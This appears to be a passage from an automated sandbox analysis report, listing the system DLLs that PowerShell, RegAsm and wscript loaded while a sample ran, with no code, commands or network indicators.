                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: scrrun.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: avicap32.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msvfw32.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: scrrun.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
